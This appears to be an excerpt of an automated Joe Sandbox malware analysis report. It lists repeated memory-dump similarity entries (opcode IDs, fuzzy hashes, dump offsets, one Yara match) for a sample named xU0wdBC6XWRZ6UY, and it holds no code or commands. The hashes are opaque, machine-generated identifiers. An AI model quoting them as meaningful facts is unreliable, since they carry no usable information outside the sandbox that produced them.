                                                          • Instruction ID: be59217a8426a7f12785654347b1ef089251462417d2ea3cce31ff92e55991e4
                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction Fuzzy Hash: E9413B31F01251DBDB62DE6884407BEBBA1EB50B64F1580EAF9C58B248D63A9D80CB90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                          • Instruction Fuzzy Hash: 89213D36600756B6EB15AB958D00AFBBBB5EF40710F40C01EFAD58B691EB34DD40C360
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf6d30e78d65a287b911686e15dff3a2ab5b6c7a1d950fd4c7a913f017cc7903
                                                          • Instruction ID: 28eca3071f40a7528c6a2408e0ee6cf194ee10c7537c333c2754e1dd1ddc595a
                                                          • Opcode Fuzzy Hash: bf6d30e78d65a287b911686e15dff3a2ab5b6c7a1d950fd4c7a913f017cc7903
                                                          • Instruction Fuzzy Hash: 5031D931A4152C9BDB36DF18CC41FEEB7B9EB15750F0101E1EAC5A7294D6789E808FA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction ID: 4e33b06a1eb10c162dec46068664972b71b785860cfdfd323094f848cef958b8
                                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                          • Instruction Fuzzy Hash: 7C218035A00609EFCB55CF58C980ACFBBE5FF48314F508065EE55DB241E671EA458BA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5659f9667461204bfe1fd66fdd9e8ae6331dd032d84074e5ddb163342348c97
                                                          • Instruction ID: eada18335eae3ca03d556e1ed99423a5a5be9cdc8e33a1e98e8f5719e1e5cfd2
                                                          • Opcode Fuzzy Hash: a5659f9667461204bfe1fd66fdd9e8ae6331dd032d84074e5ddb163342348c97
                                                          • Instruction Fuzzy Hash: 7C21C1726047459BCB62CF18C880BABB7E4FB8C764F014569FD959B642E730E9418BA2
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction ID: de9910235e5f0df7370d6dbf985d6fb2a52005c8e102e71905b3c55de1168c43
                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                          • Instruction Fuzzy Hash: 3F319C31600605EFD722CF68C884FAAB7F9EF85354F1445A9E992CB284E734EE42CB50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 676f9b98f9fc3582fd9870e0b709f5c34646febcf57da6594ad9c70b15709a9a
                                                          • Instruction ID: 53f03b232f250a492dfd417729de0262479f33e1e6931b32ef6dbef621ae9e7a
                                                          • Opcode Fuzzy Hash: 676f9b98f9fc3582fd9870e0b709f5c34646febcf57da6594ad9c70b15709a9a
                                                          • Instruction Fuzzy Hash: 90317A79A00205DFCF18CF18C8949AEB7B5FF88344B15855AE8899B391E771EE50CB90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2156d0194edf5c506aa378857e43427c6180557a5f6c137f5b7fdd12ca994550
                                                          • Instruction ID: 44303dd7bfcbad68b71adea4579795199e9d4330d1b010aa9f60a9bf25492566
                                                          • Opcode Fuzzy Hash: 2156d0194edf5c506aa378857e43427c6180557a5f6c137f5b7fdd12ca994550
                                                          • Instruction Fuzzy Hash: D421AD719006299BCF25DF99C881ABEBBF8FF48740B400069F981AB244D738AD41CBA1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be1096650387428a8196c01d98264737ab0d8a59cd986c76d93093a5fa1792d0
                                                          • Instruction ID: a6209ee1a0da9dcce2bfb8c6589d4d817e848350cdc46ee071cdf87d16ea2d4c
                                                          • Opcode Fuzzy Hash: be1096650387428a8196c01d98264737ab0d8a59cd986c76d93093a5fa1792d0
                                                          • Instruction Fuzzy Hash: 0421A171600649AFD715DBACD984FAAB7F8FF88740F140069F984DB690D638ED40CBA4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2077e18710020c6aadbf265a7bbd2e92e1ad17c9ce4965d9f9268baa57598ee6
                                                          • Instruction ID: aeacc489ecfcffe44de4a1565c6d27c42bdf11e1aedb9ee4a2a37a80c21c9530
                                                          • Opcode Fuzzy Hash: 2077e18710020c6aadbf265a7bbd2e92e1ad17c9ce4965d9f9268baa57598ee6
                                                          • Instruction Fuzzy Hash: B621C57290434A9FD711EF99D884BABBBECAF91640F4844A6BDC0CB265D734D904C7A1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35f9403be8439399f8cfca1d797ad98411b548270c490f03f93bacb2085b314e
                                                          • Instruction ID: 803b23439add673fee28fff6c679d95ebb4158f62e8a000c54eaa91ebd8dca73
                                                          • Opcode Fuzzy Hash: 35f9403be8439399f8cfca1d797ad98411b548270c490f03f93bacb2085b314e
                                                          • Instruction Fuzzy Hash: 4A21F871709681DBF322766CAC88B597BD4AF41774F2803B5F9E1DBAD2D7688841C240
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd06f7adaa12b7a4a5ff1375f2e0f35227bd01b10753277dc7fc59eb365657cf
                                                          • Instruction ID: baade8446b14cd0df47ba042f93bba8bdd54c4e59104d1459b47977206d91c23
                                                          • Opcode Fuzzy Hash: cd06f7adaa12b7a4a5ff1375f2e0f35227bd01b10753277dc7fc59eb365657cf
                                                          • Instruction Fuzzy Hash: A521AF75200701DFCB29DF29CD00B46B7F5BF48708F148468A589CB762E775E842CB94
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb53fa86793ebe37ec1591723aa883925172eb48982ef27b53d4bd8b0d686979
                                                          • Instruction ID: 28f0dcc6b58ec2fac4fb92c400b30ad594d537209e1c11f2f85ea7b84e3c5cb1
                                                          • Opcode Fuzzy Hash: cb53fa86793ebe37ec1591723aa883925172eb48982ef27b53d4bd8b0d686979
                                                          • Instruction Fuzzy Hash: 44110672380B11FFE72256599C01F6B769DDBD4BB0F950128F788CB294EF60DC018695
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b85360bdd2164d14950003f11fe35d92d300b9f48299fab8424c041c4df7b1b
                                                          • Instruction ID: b3484056264595055bdc563b198a2611fa507bf368945f28125a555fc7a765c4
                                                          • Opcode Fuzzy Hash: 7b85360bdd2164d14950003f11fe35d92d300b9f48299fab8424c041c4df7b1b
                                                          • Instruction Fuzzy Hash: A42128B1E10209ABCB24DFAAD980AAEFBF8FF98710F10012FE455E7244D7749941CB54
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction ID: 098598a722e267f9abe6f3e9371dc9e342a81a07a2bcc52b59a46c62e34782f8
                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction Fuzzy Hash: FA216D72A00209AFDB129F98CC80BEEBBBDEF98310F244856F990A7261D734D9508B50
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction ID: 405e9fdfb53b48b5effe4f5371988dc0f47834e9b47433e6e2a3bdc9cce7cb4f
                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction Fuzzy Hash: 8F11EF72640605AFE7229B48CC40F9FBBB8EB80754F100029FA808B190E671EE44CB65
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d754b36ec161428b93ec249f049961ea4d1d4c0441d084057bbc00806b3f1337
                                                          • Instruction ID: b13dc84319ce8e919db88da114054a4e4a5b22e5f79338348f1b51cfde865073
                                                          • Opcode Fuzzy Hash: d754b36ec161428b93ec249f049961ea4d1d4c0441d084057bbc00806b3f1337
                                                          • Instruction Fuzzy Hash: 3F11BF397016319BDB55CF4DC480A6ABBE9BF5A710B18C0EEEE489F205D6B2E901C790
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1970368ac491e69b13ee897489f51de729a6a4cecea102c55feedf3c58d5aee5
                                                          • Instruction ID: 92164154e29a3221a83489963981b1c1573774f14bd76a8665bc78f84b8cb472
                                                          • Opcode Fuzzy Hash: 1970368ac491e69b13ee897489f51de729a6a4cecea102c55feedf3c58d5aee5
                                                          • Instruction Fuzzy Hash: FA215E75A00215DFCB14CF58C591AAEBBF9FB88314F3481AED145A7391C771AD16CB90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dde35bd4ede5bad69f2b77500d407b8dfd7d1136771404c04b919276de77f1c6
                                                          • Instruction ID: 875c4616d576b8a851d4b46d258982980f376af42c0d4891970b95e327671943
                                                          • Opcode Fuzzy Hash: dde35bd4ede5bad69f2b77500d407b8dfd7d1136771404c04b919276de77f1c6
                                                          • Instruction Fuzzy Hash: 6A218E71500A04EFD7A48F68C880B6BB7F8FF84350F44882DE9DAC7650DB71A840CB60
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56a94d1f48fbf6cf98b3ceccd8619fd6dc3e54f2eb92bd91c0a403513fb8a8fb
                                                          • Instruction ID: 43b9061af8e970471ee3d4b5052e6c6057a74ae5e55c41f3335a21fdd22cf04f
                                                          • Opcode Fuzzy Hash: 56a94d1f48fbf6cf98b3ceccd8619fd6dc3e54f2eb92bd91c0a403513fb8a8fb
                                                          • Instruction Fuzzy Hash: 74119172240514EBD722DB59C980FDAB7ACEF99B50F114065F285DB261DA72E901C7A0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f85416ee820fac144acec8c83b01f5ec46a19a6fdd03647fa6e796b4497fec04
                                                          • Instruction ID: 21283a1ce0b91b6be933b0572f84c4ca01345f52282a37ed092f0829ca35946a
                                                          • Opcode Fuzzy Hash: f85416ee820fac144acec8c83b01f5ec46a19a6fdd03647fa6e796b4497fec04
                                                          • Instruction Fuzzy Hash: 5D116B773041159FCB19DB29CD80AAFB29BEFD1374B248538D962DB280EA319C02C390
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c85858d7bf6113a6222b88bd4e9ce1bc318176f76646a141e4d425c637bfee96
                                                          • Instruction ID: a39b1128342442b8ad436fe80a3062b0543ecd0853e66705699c6791ee63d98d
                                                          • Opcode Fuzzy Hash: c85858d7bf6113a6222b88bd4e9ce1bc318176f76646a141e4d425c637bfee96
                                                          • Instruction Fuzzy Hash: 7A11E076A01209DFCBA9CF59C580A5BBBF8FF84610B4140B9DD859B310E771DD00CBA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction ID: a442ec4f4f2664c8bdb90409d268ff36f2c96038381339502543ba5eb789b616
                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction Fuzzy Hash: A0110436A00909EFDB19CB59C805B9EFBF5EF88310F058269E88597340E671AD11CBC0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction ID: 7c6b525c3ee52564f7582be74055bcddfcb10a2f4853f7be04faa65a8d863ceb
                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction Fuzzy Hash: F511CE32600601EFEB219F88CC40B9ABBE5EF45754F458468EA8DAB260DB31DD40DBA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 9b4fd74bfcc621492ae04588df892edf145e8083dcc9c407bb5bb636b960a344
                                                          • Instruction ID: 49e0adebdc1baf7a05878fdbbf9e07baa55bf88db0321b7424c6952490ab8f77
                                                          • Opcode Fuzzy Hash: 9b4fd74bfcc621492ae04588df892edf145e8083dcc9c407bb5bb636b960a344
                                                          • Instruction Fuzzy Hash: FA01DF71240A01AFD3355B59D900B5ABAA8AF54F60F14443EF2969B394C7B1A8818B64
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe1c5d0ef717073ec0f24a9f0c1dd9197b6a32270b48cab64adff7067529d6b
                                                          • Instruction ID: 7ca3903fb9a5bcc1a4a494d7654fb85fe52df126171c5ed3be271a8a0e326875
                                                          • Opcode Fuzzy Hash: cfe1c5d0ef717073ec0f24a9f0c1dd9197b6a32270b48cab64adff7067529d6b
                                                          • Instruction Fuzzy Hash: 8AF0A432A41B35B7C7319B9A8D40F57BAAEEBC4B90F158029E6459B650DA34ED01CBA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_xU0wdBC6XWRZ6UY.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f299c77836bf3f1b68656ded1a5a8e33b97fa2103f62d13538da4491a53f8499
                                                          • Instruction ID: cd780cf196a94253c8cc7fb82b108c6bfe139aad288c5d37431de3fe68fd7885
                                                          • Opcode Fuzzy Hash: f299c77836bf3f1b68656ded1a5a8e33b97fa2103f62d13538da4491a53f8499
                                                          • Instruction Fuzzy Hash: C9F02433A0DADC0FE7224E389C801D8FF64FB4B560B2C17AAD8C177202D261A8634785
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction ID: 871e547cb0e4ab2bbea2cfef2c3efb7b7a66849250a3329ec145bd8d4fe110f4
                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                          • Instruction Fuzzy Hash: 7FF0AFB2600611ABE328CF4D9D40E57FBEEDBD5A80F048168A545C7220EA31DD04CB90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction ID: 1eee7d893b992b9549c690b9878c1fd40c4b6bc51398c0113194ebfb6136cdb2
                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                          • Instruction Fuzzy Hash: 57F02B33284A339BF736165D4940B6FAAD99FD1B64F1A4035F2899B64CCA6CCD0297D0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de76503e4cc2ee8c7fbb9f203f623a40155e8502ea05b4d807a8b659fa4ccfcd
                                                          • Instruction ID: ecb82d5b2b2a476f59cc2509684d91ae9d144028ad62e9762e5f76979b5f87bf
                                                          • Opcode Fuzzy Hash: de76503e4cc2ee8c7fbb9f203f623a40155e8502ea05b4d807a8b659fa4ccfcd
                                                          • Instruction Fuzzy Hash: 59018471A1020DEFDB04DFA9E5519DEB7F8FF58300F10406AF944EB350D6349A008BA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5bd32cb44299bbca18fc4fb9f7f29ab8b7584547fe9aa1704f18f02a6484c62
                                                          • Instruction ID: 0bfbeda25414bf2d82a457a5afccc9911e2ba68a2eadade83be52d34f4c097e7
                                                          • Opcode Fuzzy Hash: b5bd32cb44299bbca18fc4fb9f7f29ab8b7584547fe9aa1704f18f02a6484c62
                                                          • Instruction Fuzzy Hash: 2C018471A1060DEFCB04DFA9D4519AEB7F8FF58300F10406AF904EB350D674AA00CBA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35b237dcf3195c7bfd16ddeef9ea81c93a735c2858c61007f1def5a2410d680b
                                                          • Instruction ID: 7aad70de6bd09804214b782938fdbcdc8f4ac87ee4ee682574c4f9f843174ff7
                                                          • Opcode Fuzzy Hash: 35b237dcf3195c7bfd16ddeef9ea81c93a735c2858c61007f1def5a2410d680b
                                                          • Instruction Fuzzy Hash: 96018471A0020DEFDB04DFA9E45199EB7F8FF58300F50806AFA14EB350D6749D008BA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction ID: 6f63c4274ab44ff94f268a4ee00f56a1c9f087af0dbcc603f092a98afb384f7b
                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                          • Instruction Fuzzy Hash: BA01D6312006899BE762965DD909B9BBFDCEF42754F0884A6FE848F791DA79C800C210
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd1fc1935cde2d9c570bdbd589785c54d060c1d6e0a8d6322dd97611dc22e17a
                                                          • Instruction ID: 1ec5e1ecbec365aef007dceb64d9d05b3bacd0239a779c1d5d208035a67563f8
                                                          • Opcode Fuzzy Hash: cd1fc1935cde2d9c570bdbd589785c54d060c1d6e0a8d6322dd97611dc22e17a
                                                          • Instruction Fuzzy Hash: 00018F71A006499BDB04DFA9E445AEEBBF8BF58310F14405AF540EB380D738EA01CB94
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_ff0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction ID: ba4ae13015e031867259cee68cc0f7570c11dba9dfb39a621cd35c58a67d23b4
                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                          • Instruction Fuzzy Hash: 13F01D7220001DBFEF019F94DD80DEF7B7EEB59298B144125FA1196160D636DD21ABA0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
